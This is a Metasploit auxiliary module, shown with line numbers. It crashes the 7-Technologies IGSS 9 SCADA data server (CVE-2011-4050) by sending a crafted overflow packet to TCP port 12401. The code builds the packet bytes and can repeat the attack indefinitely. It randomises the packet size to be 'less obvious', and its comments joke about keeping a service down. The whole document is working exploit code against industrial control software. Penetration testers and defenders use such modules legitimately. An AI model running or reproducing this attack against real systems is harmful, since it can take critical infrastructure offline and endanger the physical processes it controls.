Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => '7-Technologies IGSS 9 IGSSdataServer.exe DoS',
13
      'Description'    => %q{
14
        The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be
15
        brought down by sending a crafted TCP packet to port 12401.  This should also work
16
        for version <= 9.0.0.1120, but that version hasn't been tested.
17
      },
18
      'Author'          =>
19
        [
20
          'jfa', # Metasploit module
21
        ],
22
      'License'         => MSF_LICENSE,
23
      'References'      =>
24
        [
25
          [ 'CVE', '2011-4050' ],
26
          [ 'OSVDB', '77976' ],
27
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01' ]
28
        ],
29
      'DisclosureDate' => '2011-12-20'
30
    ))
31

32
    register_options(
33
      [
34
        Opt::RPORT(12401),
35
        OptInt.new('COUNT', [ true, "DoS IGSSdataServer.exe this many times. 0 for infinite loop.", 1]),
36
        OptInt.new('SLEEP', [ true, 'Number of seconds to sleep between sending DoS packet.', 3])
37
      ])
38
  end
39

40
  def run
41
    #
42
    #dos = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
43
    #dos << Rex::Text.rand_text_alpha(5014)
44
    #
45
    # I should have looked at the other MSF modules before I started doing it the hard way.
46
    # Lesson learn, thanks hal. Mostly borrowed from igss9_igssdataserver_rename
47
    #
48

49
    count = datastore['COUNT']
50
    snore = datastore['SLEEP']
51
    times = 1
52

53
    # Someone wants to keep a good service down.
54
    if count == 0
55
      count = 1
56
      infinite = true
57
    end
58

59
    #
60
    # The port seems to stay open open until someone clicks "Close the program".
61
    # Once they click "Close the program" (Windows 7), the port becomes unavailable.
62
    #
63
    # However, even though it's open, it doesn't seem to handle any valid requests.
64
    #
65
    while count >= 1 do
66
      ## Randomize the buffer size to make it a teeny tiny bit less obvious
67
      size = Random.new.rand(1024..5014)
68

69
      dos  = "\x00\x04"           #Funky size causes overflow
70
      dos << "\x01\x00\x34\x12"
71
      dos << "\x0D"               #Opcode
72
      dos << "\x00\x00\x00\x00\x00\x00\x00"
73
      dos << "\x01"               #Flag
74
      dos << "\x00\x00\x00\x01\x00\x00\x00"
75
      dos << Rex::Text.rand_text_alpha(size)
76

77
      begin
78
        connect
79
        sock.put(dos)
80
        print_status("Sending DoS packet #{times}, size: #{dos.length} ...")
81
        disconnect
82
      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
83
        print_status("Connection refused. Someone may have clicked 'Close the program'")
84
      end
85

86
      if infinite
87
        select(nil, nil, nil, snore)
88
        times += 1
89
      else
90
        select(nil, nil, nil, snore) if count > 1
91
        count -= 1
92
        times += 1
93
      end
94

95
    end
96
  end
97
end
98

99